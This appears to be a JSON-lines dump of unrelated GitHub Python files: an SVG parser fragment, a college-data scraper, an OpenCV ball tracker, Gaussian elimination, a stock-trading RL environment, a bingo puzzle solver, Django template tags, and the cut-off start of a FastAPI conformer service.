refid:\n # [1:] to ignore leading '#' in reference\n path = '//*[@id=\"%s\"]' % refid[1:]\n refnode = node.xpath(path)\n \n if refnode:\n x = float(node.get('x', '0'))\n y = float(node.get('y', '0'))\n \n if (x != 0) or (y != 0):\n node_transform = simpletransform.composeTransform(node_transform, simpletransform.parseTransform('translate(%f,%f)' % (x, y)))\n \n # TODO: this looks unnecessary\n node_visibility = node.get('visibility', node_visibility)\n\n self.recursivelyTraverseSvg(refnode, node_transform, parent_visibility=node_visibility)\n elif not isinstance(node.tag, basestring):\n pass\n # Entity tags\n else:\n entity = self.make_entity(node, node_transform)\n \n if entity == None:\n pass\n # print('unable to draw object, please convert it to a path first.')\n\n def make_entity(self, node, node_transform):\n \"\"\"\n Construct an appropriate entity for this SVG node.\n \"\"\"\n for nodetype in SvgParser.entity_map.keys():\n tag = nodetype\n ns = 'svg'\n \n if type(tag) is tuple:\n tag = nodetype[0]\n ns = nodetype[1]\n \n if node.tag == inkex.addNS(tag, ns) or node.tag == tag:\n cls = SvgParser.entity_map[nodetype]\n\n entity = cls(node, node_transform)\n self.entities.append(entity)\n \n return entity\n \n return None\n\n\n","repo_name":"vimior/UF-Debug-Tool","sub_path":"gcode/lib/contour/svg.py","file_name":"svg.py","file_ext":"py","file_size_in_byte":14416,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"34"} +{"seq_id":"5302447967","text":"from bs4 import BeautifulSoup\nimport requests\nimport csv\nimport time\nimport itertools\nimport os\n\n\ncity_list = [\"Phoenix\", \"Mesa\", \"Chandler\", \"San Antonio\", \"New Braunfels\", \"Philadelphia\", \"Camden\", \"Wilmington\",\n \"Denver\", \"Aurora\", \"Lakewood\", \"Boston\", \"Cambridge\", \"Newton\", \"Chicago\", \"Naperville\", \"Elgin\",\n \"New York\", \"Newark\", \"Jersey City\", \"Seattle\", \"Tacoma\", \"Bellevue\", \"Los Angeles\", \"Long Beach\",\n \"Anaheim\", \"San Francisco\", \"Oakland\", \"Berkeley\", \"Washington\", \"Arlington\", \"Alexandria\"]\n\ncity_set = {\"Phoenix\", \"Mesa\", \"Chandler\", \"San Antonio\", \"New Braunfels\", \"Philadelphia\", \"Camden\", \"Wilmington\",\n \"Denver\", \"Aurora\", \"Lakewood\", \"Boston\", \"Cambridge\", \"Newton\", \"Chicago\", \"Naperville\", \"Elgin\",\n \"New York\", \"Newark\", \"Jersey City\", \"Seattle\", \"Tacoma\", \"Bellevue\", \"Los Angeles\", \"Long Beach\",\n \"Anaheim\", \"San Francisco\", \"Oakland\", \"Berkeley\", \"Washington\", \"Arlington\", \"Alexandria\"}\n\ncity_state_map = {'Phoenix': 'AZ', 'Mesa': 'AZ', 'Chandler': 'AZ', 'San Antonio': 'TX',\n 'New Braunfels': 'TX', 'Philadelphia': 'PA', 'Camden': 'NJ', 'Wilmington': 'DE',\n 'Denver': 'CO', 'Aurora': 'CO', 'Lakewood': 'CO', 'Boston': 'MA', 'Cambridge': 'MA',\n 'Newton': 'MA', 'Chicago': 'IL', 'Naperville': 'IL', 'Elgin': 'IL', 'New York': 'NY',\n 'Newark': 'NJ', 'Jersey City': 'NJ', 'Seattle': 'WA', 'Tacoma': 'WA', 'Bellevue': 'WA',\n 'Los Angeles': 'CA', 'Long Beach': 'CA', 'Anaheim': 'CA', 'San Francisco': 'CA',\n 'Oakland': 'CA', 'Berkeley': 'CA', 'Washington': 'DC', 'Arlington': 'VA',\n 'Alexandria': 'VA'}\n\ncity_msa_map = {'Phoenix': 'Greater Phoenix Area', 'Mesa': 'Greater Phoenix Area', 'Chandler': 'Greater Phoenix Area',\n 'San Antonio': 'Greater San Antonio', 'New Braunfels': 'Greater San Antonio',\n 'Philadelphia': 'Greater Philadelphia', 'Camden': 'Greater Philadelphia',\n 'Wilmington': 'Greater Philadelphia', 'Denver': 'Greater Denver Area', 'Aurora': 'Greater Denver Area',\n 'Lakewood': 'Greater Denver Area', 'Boston': 'Greater Boston', 'Cambridge': 'Greater Boston',\n 'Newton': 'Greater Boston', 'Chicago': 'Greater Chicago Area', 'Naperville': 'Greater Chicago Area',\n 'Elgin': 'Greater Chicago Area', 'New York': 'New York Metropolitan Area',\n 'Newark': 'New York Metropolitan Area', 'Jersey City': 'New York Metropolitan Area',\n 'Seattle': 'Greater Seattle', 'Tacoma': 'Greater Seattle', 'Bellevue': 'Greater Seattle',\n 'Los Angeles': 'Greater LA Area', 'Long Beach': 'Greater LA Area', 'Anaheim': 'Greater LA Area',\n 'San Francisco': 'San Francisco Bay Area', 'Oakland': 'San Francisco Bay Area',\n 'Berkeley': 'San Francisco Bay Area', 'Washington': 'Washington Metropolitan Area',\n 'Arlington': 'Washington Metropolitan Area', 'Alexandria': 'Washington Metropolitan Area'}\n\nnces_base_url = \"https://nces.ed.gov/collegenavigator/\"\n\nfileName = \"MSA_Finance_graduates_count.csv\"\n\n\ndef visit_college_and_extract_data(college_url):\n pass\n\n\nif __name__ == \"__main__\":\n start_time = time.time()\n total_number_of_seats = {}\n total_finance_seats = {}\n msa_total_grads = {}\n msa_finance_grads = {}\n for city in city_state_map:\n nces_url = \"https://nces.ed.gov/collegenavigator/?q=city&s=state\"\n state = city_state_map[city]\n total_number_of_seats[city] = 0\n total_finance_seats[city] = 0\n nces_url = nces_url.replace('state', state)\n nces_url = nces_url.replace('city', city)\n response = requests.get(nces_url)\n soup = BeautifulSoup(response.text, 'html.parser')\n colleges = itertools.chain(soup.findAll(class_='resultsY'), soup.findAll(class_='resultsW'))\n\n for college in colleges:\n college_url_postfix = college.find('a')['href']\n college_url = nces_base_url + college_url_postfix\n visit_college_and_extract_data(college_url)\n print(college_url)\n response = requests.get(college_url)\n soup = BeautifulSoup(response.text, 'html.parser')\n subrows = soup.findAll(class_=\"subrow\")\n Grand_total_string = \"Grand total\"\n Finance_String = \"Finance\"\n\n for subrow in subrows:\n # print(subrow)\n if Grand_total_string in subrow.find('td'):\n # print(subrow)\n st = str(subrow)\n st = st.replace(\"-\", \",\")\n st = st.replace(\"\", \"\")\n st = st.replace('
    ', \"\")\n st = st.replace('d', '')\n values = st.split('')\n local_count = 0\n for value in values:\n value = value.replace(',', '')\n local = 0\n try:\n local = int(value)\n except ValueError:\n print(\"Not an int: \" + str(value))\n local_count += local\n total_number_of_seats[city] = total_number_of_seats[city] + local_count\n print(local_count)\n\n indents = soup.findAll(class_=\"level1indent\")\n\n for indent in indents:\n # print(indent)\n # if str(indent.find('td')).find(Finance_String) != -1:\n if Finance_String in str(indent.find('td')):\n # print(indent)\n st = str(indent)\n st = st.replace(\"-\", \",\")\n st = st.replace(\"
    \", \"\")\n st = st.replace('
    ', \"\")\n st = st.replace('d','')\n values = st.split('')\n # values = values[1].split(',')\n local_count = 0\n for value in values:\n value = value.replace(',', '')\n local = 0\n try:\n local = int(value)\n except ValueError:\n print(\"Not an int: \" + str(value))\n local_count += local\n total_finance_seats[city] = total_finance_seats[city] + local_count\n print(local_count)\n\n for city in city_state_map:\n msa = city_msa_map[city]\n if msa not in msa_total_grads:\n msa_total_grads[msa] = 0\n if msa not in msa_finance_grads:\n msa_finance_grads[msa] = 0\n\n msa_total_grads[msa] = msa_total_grads[msa] + total_number_of_seats[city]\n msa_finance_grads[msa] = msa_finance_grads[msa] + total_finance_seats[city]\n\n with open(fileName, mode='w') as job_count_new_file:\n count_writer = csv.writer(job_count_new_file, delimiter=',', quotechar='\"', quoting=csv.QUOTE_MINIMAL)\n for msa in msa_total_grads:\n count_writer.writerow([msa,msa_finance_grads[msa], msa_total_grads[msa]])\n\n\n end_time = time.time()\n print(\"Total time taken: \" + str(end_time - start_time))","repo_name":"ASUCICREPO/GPEC-Automated-pipeline","sub_path":"graduate-data.py","file_name":"graduate-data.py","file_ext":"py","file_size_in_byte":7428,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"39001651616","text":"import numpy as np\nimport cv2\n\ncap = cv2.VideoCapture('leomessi.mp4')\n\nwhile(cap.isOpened()):\n ret, frame = cap.read()\n\n blurred = cv2.GaussianBlur(frame, (11, 11), 0)\n\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2HSV)\n\n greenLower = (29, 86, 6)\n greenUpper = (64, 255, 255)\n\n mask = cv2.inRange(gray, greenLower, greenUpper)\n mask = cv2.erode(mask, None, iterations=2)\n mask = cv2.dilate(mask, None, iterations=2)\n\n cnts = cv2.findContours(mask, 1, 2)[0]\n\n if len(cnts) > 0:\n\n for cnt in cnts:\n\n arc =0.01*cv2.arcLength(cnt, True)\n approx = cv2.approxPolyDP(cnt, arc, True)\n\n if len(approx)>10:\n\n (x,y),radius = cv2.minEnclosingCircle(cnt)\n center = (int(x),int(y))\n radius = int(radius)\n area_e = 3.14*radius*radius\n area_c = cv2.contourArea(cnt)\n #print(area_c, end = \" \")\n #print(area_e)\n\n if area_c > area_e - 2000 and area_c < area_e + 2000: \n if radius > 30 and radius < 70:\n frame = cv2.circle(frame,center,radius,(0,255,0),2)\n\n cv2.imshow('frame',frame)\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n cv2.waitKey(50)\n\ncap.release()\ncv2.destroyAllWindows()\n","repo_name":"omkarghugarkar007/Autumn-of-Automation","sub_path":"OpenCV/Assignment5.1.py","file_name":"Assignment5.1.py","file_ext":"py","file_size_in_byte":1310,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"34"} +{"seq_id":"4758624199","text":"import numpy as np\n\nclass GaussianElimination:\n def __init__(self, A: np.ndarray, b:np.ndarray):\n self.M = A.copy()\n self.x = b.copy()\n\n\n def solve(self):\n n_rows, n_cols = self.M.shape\n # Forward Substitution\n for i in range(n_rows):\n if (self.M[i, i] == 0):\n for k in range(i + 1, n_rows):\n if (self.M[k, i] != 0):\n self.__swap_rows(i, k)\n break\n pivot = self.M[i,i]\n self.M[i] /= pivot\n self.x[i] /= pivot\n for j in range(i+1, n_rows):\n scale_f = self.M[j,i]\n self.M[j] -= scale_f*self.M[i]\n self.x[j] -= scale_f*self.x[i]\n\n # Backward Substitution\n for i in range(n_rows-1, -1, -1):\n for j in range(i):\n scale_f = self.M[j,i]\n self.M[j] -= scale_f*self.M[i]\n self.x[j] -= scale_f*self.x[i]\n # self.x= self.x[self.__x_indices]\n\n def __swap_rows(self, i, j):\n self.M[[i,j]] = self.M[[j,i]]\n self.x[[i,j]] = self.x[[j,i]]\n","repo_name":"Dhavaleswar/NumericalAlgos","sub_path":"Algos/GaussianElemination.py","file_name":"GaussianElemination.py","file_ext":"py","file_size_in_byte":1138,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"71491812898","text":"import pandas as pd\nimport os\n\ndef load_data(months, instrument='AMZN'):\n ''' Returns pandas dataframe for one instrument\n Inputs:\n months - list of month ints to be loaded over the two years e.g. [11, 12, 13, 14]\n instrument - str instrument to be loaded in for those months e.g. 'GOOG'\n Outputs:\n data - pd.DataFrame\n '''\n data = pd.DataFrame()\n \n for month in months:\n try:\n # Create path regardless of os system\n path_name = os.path.join(os.getcwd(), 'data', instrument, f'{month}.csv')\n monthly_data = pd.read_csv(path_name)\n except:\n raise FileNotFoundError(\"Refer to generate_data script to obtain data.\")\n \n # Assuming we only want to keep time, close and volume - removing open, high and low\n data = pd.concat([data, monthly_data[['time', 'close', 'volume']]], axis=0)\n \n # Sort by time and reset index\n data['time'] = pd.to_datetime(data.time)\n return data.sort_values('time').reset_index().drop('index', axis=1)\n\n############################################################################\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nSMALL, MED, LARGE = 22, 28, 34\nLW = 1.5\nplt.rc('xtick',labelsize=SMALL)\nplt.rc('ytick',labelsize=SMALL)\n\nSELL, HOLD, BUY = 0, 1, 2\n\ndef continuous_actions(target):\n ''' Input: Target actions (continuous space)\n \n Output: Returns the indexes where a BUY, HOLD or SELL occurs'''\n buy_indexes = []\n buy2_indexes = []\n sell_indexes = []\n sell2_indexes = []\n\n for interval in range(1, len(target)):\n diff = target[interval] - target[interval - 1]\n sign = target[interval] * target[interval - 1]\n\n if diff == 0:\n continue\n\n if diff > 0 and sign >= 0:\n buy_indexes.append(interval)\n elif diff > 0 and sign < 0:\n buy2_indexes.append(interval)\n elif diff < 0 and sign >= 0:\n sell_indexes.append(interval)\n elif diff < 0 and sign < 0:\n sell2_indexes.append(interval)\n \n return buy_indexes, buy2_indexes, sell_indexes, sell2_indexes\n \ndef plot(prices, target_positions=[], portfolio_values=[], title='', filename='', right_y_adjust=1.07, legend_loc='upper left',\n cont=False):\n ''' Output a graph of prices and optionally positions and portfolio values. Will save if filename provided \n Inputs:\n NECESSARY ARGUMENTS:\n prices - array of stock prices e.g. [1.02, 1.03, 1.01, 1.03, 1.05]\n \n OPTIONAL ARGUMENTS:\n target_positions - array of target positions in {0, 1, 2}, equal in length to prices e.g. [0, 0, 1, 1, -1]\n portfolio_values - array of portfolio values, equal in length to prices e.g. [100.00, 99.89, 99.93, 100.02, 100.10]\n title - string title e.g. 'Test Title'\n filename - string filename, plot will be saved if a non-empty value is given e.g. 'test graph'\n right_y_adjust - float for adjusting rightmost y axis if there is clipping\n legend_loc - string describing legend position according to matplotlib.pyplot legend locs\n cont - flag for continuous action space\n '''\n portfolio_values = list(portfolio_values)\n target_positions = list(target_positions)\n prices_colour, portfolio_colour, buy_colour, sell_colour = 'C0', 'C1', '#49E20E', '#FF0000'\n \n fig, ax1 = plt.subplots(figsize=(18, 6))\n ax2 = ax1.twinx()\n ax1.set_zorder(ax2.get_zorder()+1)\n ax1.patch.set_visible(False)\n ax1.spines['top'].set_color('none')\n ax2.spines['top'].set_color('none')\n \n # Plot positions\n if target_positions:\n \n # if the agent has continuous action space\n if cont:\n buy_indexes, buy2_indexes, sell_indexes, sell2_indexes = continuous_actions(target_positions)\n else:\n buy_indexes = np.where(np.diff(target_positions) == 1)[0] + 1\n buy2_indexes = np.where(np.diff(target_positions) == 2)[0] + 1\n sell_indexes = np.where(np.diff(target_positions) == -1)[0] + 1\n sell2_indexes = np.where(np.diff(target_positions) == -2)[0] + 1\n buys = np.take(prices, buy_indexes, 0)\n buys2 = np.take(prices, buy2_indexes, 0)\n sells = np.take(prices, sell_indexes, 0)\n sells2 = np.take(prices, sell2_indexes, 0)\n \n first = target_positions[0]\n if first == BUY:\n ax1.scatter([0], prices[0], zorder=10, s=150, edgecolors='black', linewidths=0.5, marker='o', alpha=0.7, c=buy_colour)\n elif first == SELL:\n ax1.scatter([0], prices[0], zorder=10, s=150, edgecolors='black', linewidths=0.5, marker='o', alpha=0.7, c=sell_colour)\n \n ax1.scatter(buy2_indexes, buys2, zorder=10, s=200, edgecolors='black', linewidths=0.5, marker='^', alpha=0.7,\n label='Buy x2', c=buy_colour)\n ax1.scatter(buy_indexes, buys, zorder=10, s=150, edgecolors='black', linewidths=0.5, marker='o', alpha=0.7,\n label='Buy', c=buy_colour)\n ax1.scatter(sell_indexes, sells, zorder=10, s=150, edgecolors='black', linewidths=0.5, marker='o', alpha=0.7,\n label='Sell', c=sell_colour)\n ax1.scatter(sell2_indexes, sells2, zorder=10, s=200, edgecolors='black', linewidths=0.5, marker='v', alpha=0.7,\n label='Sell x2', c=sell_colour)\n ax1.legend(frameon=False, fontsize=SMALL, loc=legend_loc)\n \n # Plot prices and portfolio values\n ax1.plot(prices, lw=LW, c=prices_colour)\n if portfolio_values:\n ax2.plot(portfolio_values, lw=LW, c=portfolio_colour)\n \n # Label\n ax1.set_title(title, fontsize=LARGE)\n ax1.set_xlabel('Index', fontsize=LARGE)\n ax1.set_ylabel('Stock Price ($)', fontsize=MED, c=prices_colour)\n ax1.tick_params(axis='y', labelcolor=prices_colour)\n \n if portfolio_values:\n ax2.set_ylabel('Portfolio Value ($)', fontsize=MED, zorder=100, c=portfolio_colour, rotation=270)\n ax2.yaxis.set_label_coords(right_y_adjust, 0.5)\n ax2.tick_params(axis='y', labelcolor=portfolio_colour)\n else:\n ax2.get_yaxis().set_visible(False)\n ax1.spines['right'].set_color('none')\n ax2.spines['right'].set_color('none')\n \n # Plot and potentially save\n plt.tight_layout()\n if filename:\n plt.savefig(f'{filename}.png', dpi=fig.dpi)\n\n plt.show()\n \n \n############################################################################\nimport gym\nfrom gym import spaces\nfrom gym.utils import seeding\n\nINITIAL_BALANCE = 10_000\nPAST_TICKS = 5\nMAX_CHANGE = 1000\n\nclass Environment(gym.Env): \n # required for stable baselines \n metadata = {'render.modes': ['human']}\n \n SELL, HOLD, BUY = 0, 1, 2\n PRICES, POSITION, BALANCE = 0, 1, 2\n \n def __init__(self, data, balance=INITIAL_BALANCE, transaction_cost=0.001, i=0, position=1, past_ticks=PAST_TICKS,\n train=False):\n if isinstance(data, pd.DataFrame) or isinstance(data, pd.Series):\n raise ValueError('Only lists or arrays allowed')\n \n self.logger = []\n self.epoch_count = 0\n self.step_count = 0\n self.train = train\n \n self.past_ticks = past_ticks\n self.curr_step = self.past_ticks+1\n self.initial_balance = self.balance = balance\n \n self.done = False\n self.data = data\n self.position = position\n self.transaction_cost = transaction_cost\n self.cumulative_tc = 0\n self._seed()\n \n # Sell, Hold, Buy == 0, 1, 2 \n self.action_space = spaces.Discrete(3)\n\n # Observation space has past_ticks prices up to and included current price, then position\n self.observation_space = spaces.Box(low=-MAX_CHANGE, high=MAX_CHANGE, shape = (self.past_ticks+1, ))\n\n def _next_observation(self): \n '''Getting the next observation'''\n \n # Convert frame into returns\n # These two lines don't work for the DQN\n frame = np.array(self.data[self.curr_step - self.past_ticks: self.curr_step + 1])###################################\n frame = np.diff(frame) / frame[:-1] * 100\n \n # This line does for some reason\n #frame = np.array(self.data[self.curr_step - self.past_ticks + 1: self.curr_step + 1])\n \n obs = np.append(frame, [self.position], axis=0)\n return obs\n\n def _take_action(self, action):\n curr_price = self.data[self.curr_step]\n \n # Perform position transition (transaction cost is a proportion of price)\n self.balance -= curr_price * self.transaction_cost * abs(action - self.position)\n \n # A Buy\n if (action == self.BUY and self.position == self.HOLD) or (action == self.HOLD and self.position == self.SELL):\n self.balance -= curr_price\n self.cumulative_tc += 1\n \n # A Sell\n elif (action == self.SELL and self.position == self.HOLD) or (action == self.HOLD and self.position == self.BUY):\n self.balance += curr_price\n self.cumulative_tc += 1\n \n # Flip Position\n elif abs(action - self.position) == 2:\n self.balance -= 2 * (action-1) * curr_price\n self.cumulative_tc += 1\n \n # Update position and time\n self.position = action\n self.curr_step += 1\n \n def step(self, action):\n ''' Updates environment with action taken, returns new state and reward from state transition ''' \n prior_portfolio_value = self.get_portfolio_value()\n\n # Take action\n self._take_action(action)\n \n # current portfolio value\n self.portfolio_value = self.get_portfolio_value()\n \n # the change in portfolio value\n reward = self.portfolio_value - prior_portfolio_value \n # Percentange change from initial portfolio value\n #reward = 100 * ((self.portfolio_value/self.initial_balance) - 1) \n self.logger.append([self.epoch_count, reward, self.portfolio_value, self.cumulative_tc, self.curr_step])\n self.step_count += 1\n \n # Are we done?\n if self.balance <= 0:\n self.done = True\n reward = -1e6\n if self.curr_step >= len(self.data) - 2:\n self.done = True\n if self.train and self.step_count >= 10_000:\n self.done = True\n \n obs = self._next_observation()\n # required to return: observation, reward, done, info\n return obs, reward, self.done, {\"logs\": self.logger}\n \n def get_portfolio_value(self):\n ''' Returns current portfolio value '''\n curr_price = self.data[self.curr_step]\n \n if self.position == self.BUY:\n return self.balance + curr_price\n \n elif self.position == self.SELL:\n return self.balance - curr_price\n \n return self.balance\n \n def reset(self, rand_start=True):\n '''Reset everything as if we just started (for a new episode)'''\n self.position = self.HOLD\n self.balance = self.initial_balance\n self.portfolio_value = self.balance\n self.done = False\n self.curr_step = np.random.randint(self.past_ticks, len(self.data)-10_000) if rand_start else self.past_ticks+1\n \n self.epoch_count += 1\n self.cumulative_tc = 0\n \n if self.train:\n self.step_count=0\n \n obs = self._next_observation() \n return obs \n\n def save_portfolio(self, mode='human'):\n with open('output.csv', 'a') as file:\n file.write(f'{self.curr_step},{self.portfolio_value},{self.balance}\\n')\n \n def _seed(self, seed=None):\n self.np_random, seed = seeding.np_random(seed)\n return [seed]\n \n def __repr__(self):\n return f'Balance: ${round(self.balance, 2)}, Price: ${round(self.data[self.curr_step], 2)}, ' +\\\n f'Position: {self.position}'\n \n def get_data(self):\n ''' Returns curr_price, balance, portfolio_value '''\n return self.data[self.curr_step], self.get_portfolio_value()\n\n############################################################################\nimport os\ndef write_to_logs(logs, filename):\n # [reward, portfolio, curr_step]\n if not os.path.exists(f'./logs'):\n os.makedirs(f'./logs')\n path = f\"logs/{filename}.csv\"\n logs = pd.DataFrame(logs) \n logs.to_csv(path, header=[\"epoch\", \"reward\", \"portfolio\", \"cumulative_tc\", \"curr_step\"], index=False)\n\ndef moving_average(values, window=10):\n \"\"\"\n Smooth values by doing a moving average\n :param values: (numpy array)\n :param window: (int)\n :return: (numpy array)\n \"\"\"\n weights = np.repeat(1.0, window) / window\n return np.convolve(values, weights, 'valid') \n \ndef plot_k_timesteps(logs, k=100, y_col=\"reward\", window=100):\n ''' logs - the file where logs are stored\n k - log at each k timesteps \n y_col - reward or portfolio\n window - window to average over'''\n df = pd.read_csv(logs)\n df.new = df.iloc[::k, :]\n x = np.arange(0, len(df.new))\n y = df.new[y_col]\n y = moving_average(y, window=window)\n \n # Truncate x\n x = x[len(x) - len(y):]\n\n #plots reward at each k timestep\n fig, ax = plt.subplots(figsize=(14,8))\n plt.plot(x, y)\n \n ax.set_title(f\"{y_col} at each timestep\", fontsize=22)\n ax.set_xlabel('timestep', fontsize=20)\n ax.set_ylabel(y_col, fontsize=20)\n","repo_name":"YAOS5/Amazon-Trading-Bot","sub_path":"ads_utils.py","file_name":"ads_utils.py","file_ext":"py","file_size_in_byte":13657,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"72266551139","text":"import os\nimport numpy as np\n\nclass BingoBoard():\n\n\tdef __init__(self, size):\n\t\tself.size = size\n\t\tself.board = np.zeros(size, size)\n\t\tself.marked = np.zeros(size, size)\n\n\tdef __init__(self, size, initial_state):\n\t\tself.size = size\n\t\tself.board = initial_state\n\t\tself.marked = np.zeros([size, size])\n\n\tdef __str__(self):\n\t\tret = []\n\t\tfor i in range(self.size):\n\t\t\tfor j in range(self.size):\n\t\t\t\tif self.marked[i,j]:\n\t\t\t\t\tret.append(\" *%2i* \" % self.board[i,j])\n\t\t\t\telse:\n\t\t\t\t\tret.append(\" %2i \" % self.board[i,j])\n\n\t\t\tret.append(\"\\n\")\n\t\treturn \"\".join(ret)\n\n\tdef checkNumber(self, num):\n\t\t# Check if number is on board and unmarked\n\t\tx,y = np.squeeze(np.where(self.board[:,:] == num))\n\t\tif x >= 0 and y >= 0:\n\t\t\t# Mark number on board\n\t\t\tself.marked[x,y] = 1\n\n\tdef checkWin(self):\n\t\t# If there is a winning row, return True and [i,-1] where i is the index of the winning row.\n\t\t# If there is a winning col, return True and [-1,i] where i is the index of the winning col.\n\n\t\tfor i in range(self.size):\n\t\t\t# If the elements of a row or column multiplied are 1, means that row/col has been filled.\n\t\t\tr = np.prod(self.marked[i,:])\n\t\t\tc = np.prod(self.marked[:,i])\n\t\t\tif r:\n\t\t\t\treturn True, [i,-1]\n\t\t\tif c:\n\t\t\t\treturn True, [-1,i]\n\n\t\treturn False, [-1,-1]\n\n\tdef computeScore(self, num):\n\t\tunmarked = self.board[self.marked == 0]\n\t\tscore = num*np.sum(unmarked)\n\t\treturn score\n\n\tdef getBoard(self):\n\t\treturn self.board\n\n\tdef getMarked(self):\n\t\treturn self.marked\n\n\nif __name__ == \"__main__\":\n\n\t# Change this to match name of input file with data\n\tFILENAME = 'input.txt'\n\n\t# Current Directory\n\tpwd = os.getcwd()\n\n\t# Check if input file exists in base folder\n\tif FILENAME in os.listdir(pwd):\n\n\t\t# Get each line of data\n\t\twith open(FILENAME, 'r') as infile:\n\t\t\tdata = infile.readlines()\n\n\t\t# Clean data\n\t\tdata = [elem.rstrip() for elem in data]\n\n\t\tnumbers = [int(elem) for elem in data[0].split(',')]\n\t\tboards = [line.strip().split() for line in data[1:] if line ] # Filter out empty lines\n\t\tboard_size = len(boards[1])\n\t\tnum_boards = len(boards)//board_size\n\n\t\tbingo_boards = []\n\n\t\t# Extract inital state of all boards and initialize BingoBoards for each\n\t\tfor idx in range(num_boards):\n\t\t\t# Get initial state of the board\n\t\t\tinitial_state = np.asarray([boards[idx*board_size+j] for j in range(board_size)], dtype=int)\n\n\t\t\t# Create BingoBoard object with initial state\n\t\t\tbboard = BingoBoard(board_size, initial_state)\n\t\t\tbingo_boards.append(bboard)\n\n\n\t\t### PART 1 ###\n\n\t\t# winning_board = None\n\t\t# winning_score = 0\n\t\t# finished = False\n\n\t\t# for num in numbers:\n\t\t# \tfor bingo_board in bingo_boards:\n\t\t# \t\tbingo_board.checkNumber(num)\n\t\t# \t\twon, idx = bingo_board.checkWin()\n\t\t# \t\tif won:\n\t\t# \t\t\tscore = bingo_board.computeScore(num)\n\t\t# \t\t\tif score > winning_score:\n\t\t# \t\t\t\twinning_score = score \n\t\t# \t\t\t\twinning_board = bingo_board\n\t\t# \t\t\tbingo_boards.remove(bingo_board)\n\t\t# \t\t\tfinished = True\n\t\t\t\n\t\t# \tif finished:\n\t\t# \t\tbreak\n\n\n\t\t#print(winning_score)\n\t\t#print(winning_board)\n\n\n\t\t### PART 2 ###\n\t\tfinished = False\n\t\twinning_boards = []\n\n\t\tfor num_idx,num in enumerate(numbers):\n\t\t\tfor idx in range(len(bingo_boards)):\n\t\t\t\tbingo_board = bingo_boards[idx]\n\t\t\t\tif bingo_board:\n\t\t\t\t\tbingo_board.checkNumber(num)\n\t\t\t\t\twon, _ = bingo_board.checkWin()\n\t\t\t\t\tif won:\n\t\t\t\t\t\twinning_boards.append([bingo_board, bingo_board.computeScore(num), num])\n\t\t\t\t\t\tlength = sum([True for a in bingo_boards if a])\n\t\t\t\t\t\tbingo_boards[idx] = False\n\t\t\t\t\t\tif length == 1:\n\t\t\t\t\t\t\tfinished = True\n\t\t\tif finished:\n\t\t\t\tbreak\n\t\t\t\t\t\t\n\n\t\tlosing_board, losing_score, _ = winning_boards[-1]\n\t\tprint(\"\\nSCORE: %i\" % losing_score)\n\t\tprint(losing_board)\n\n\n\n\telse:\n\t\traise(AssertionError(\"$s not found in $s\" % (FILENAME, pwd)))","repo_name":"Fquico1999/advent_of_code_2021","sub_path":"day_4/day_4.py","file_name":"day_4.py","file_ext":"py","file_size_in_byte":3690,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"12877334765","text":"import math\n\nfrom django import template\nfrom django.conf import settings\nfrom django.utils.formats import get_format\nfrom django.utils.translation import get_language\n\nfrom ..helpers import chunks as chunks_helper, in_group_plain\n\nregister = template.Library()\n\n\n@register.simple_tag\ndef settings_value(name):\n return getattr(settings, name, \"\")\n\n\n@register.simple_tag\ndef settings_format(name):\n lang = get_language()\n return get_format(name, lang, use_l10n=settings.USE_L10N)\n\n\n@register.simple_tag\ndef format_get_values(request, name, key):\n GET = request.GET.copy()\n key = str(key)\n value = GET.get(name, None)\n\n if value is not None and key in value:\n value = ','.join(filter(lambda v: key != v, value.split(',')))\n else:\n value = value.split(',') if value else []\n value = ','.join(value + [key])\n\n if value:\n GET[name] = value\n else:\n GET.pop(name, None)\n params = GET.urlencode()\n\n return '{}?{}'.format(request.path, params)\n\n\n@register.simple_tag\ndef request_path_replace(request, key, value=None):\n GET = request.GET.copy()\n if value:\n GET[key] = value\n else:\n GET.pop(key, None)\n GET.pop('page', None)\n params = GET.urlencode()\n return '{}?{}'.format(request.path, params)\n\n\n@register.filter\ndef split(string, separator):\n return string.split(separator)\n\n\n@register.filter\ndef substract(md, sd):\n return md - sd\n\n\n@register.filter\ndef get(item, key):\n return item.get(key, None)\n\n\n@register.filter\ndef in_group(user, group):\n return in_group_plain(user, group)\n\n\n@register.filter\ndef chunks(l, m):\n if l is None:\n return l\n return chunks_helper(l, m)\n\n\n@register.filter\ndef chunks_by(l, m):\n if l is None:\n return l\n if len(l) < 6:\n return [l]\n return chunks_helper(l, math.ceil(len(l) / m))\n","repo_name":"mtrgroup/django-mtr-utils","sub_path":"mtr/utils/templatetags/mtr_utils.py","file_name":"mtr_utils.py","file_ext":"py","file_size_in_byte":1856,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"16510203928","text":"# Standard library imports\nfrom argparse import ArgumentParser\nfrom typing import Dict, List, Union, Optional\n\n# Third-party imports\nimport torch\nimport uvicorn\nimport yaml\nfrom fastapi import FastAPI, HTTPException\nfrom pydantic import BaseModel\nfrom rdkit.Chem import Mol, AllChem, MolToMolBlock\n\n# Local application/library specific imports\nfrom diffusion.likelihood import populate_likelihood\nfrom diffusion.sampling import get_seed, embed_seeds, perturb_seeds, pyg_to_mol, sample\nfrom utils.utils import get_model\n\n\n# If your conformer generation logic is in a different module, import it here\n# from your_script_name import generate_conformers\n\napp = FastAPI()\n\nclass ConformerRequest(BaseModel):\n smiles: list[str]\n energy_calculation: str = \"xtb\" # 'xtb' or 'mmff'\n num_conformers: int = 10\n\n\nparser = ArgumentParser()\nargs = parser.parse_args()\nwith open(f'workdir/drugs_default/model_parameters.yml') as f:\n args.__dict__.update(yaml.full_load(f))\n\n\nmodel = get_model(args)\nstate_dict = torch.load(f'workdir/drugs_default/best_model.pt', map_location=torch.device('cpu'))\nargs.xtb = \"/home/loschen/calc/xtb-6.6.1/bin/xtb\"\nmodel.load_state_dict(state_dict, strict=True)\ndevice = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\nmodel = 